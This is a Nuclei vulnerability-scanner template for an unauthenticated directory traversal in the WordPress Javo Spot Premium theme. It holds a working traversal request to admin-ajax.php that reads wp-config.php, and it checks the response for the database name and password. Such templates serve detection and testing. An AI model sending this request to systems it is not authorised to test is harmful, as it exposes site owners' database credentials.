id: wp-spot-premium-lfi

info:
  name: WordPress Javo Spot Premium Theme - Unauthenticated Directory Traversal
  author: dhiyaneshDk
  severity: high
  description: WordPress Javo Spot Premium Theme `wp-config` was discovered via local file inclusion. This file is remotely accessible and its content available for reading.
  reference:
    - https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab
    - https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/
  tags: wordpress,backup,wpscan

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/04/12
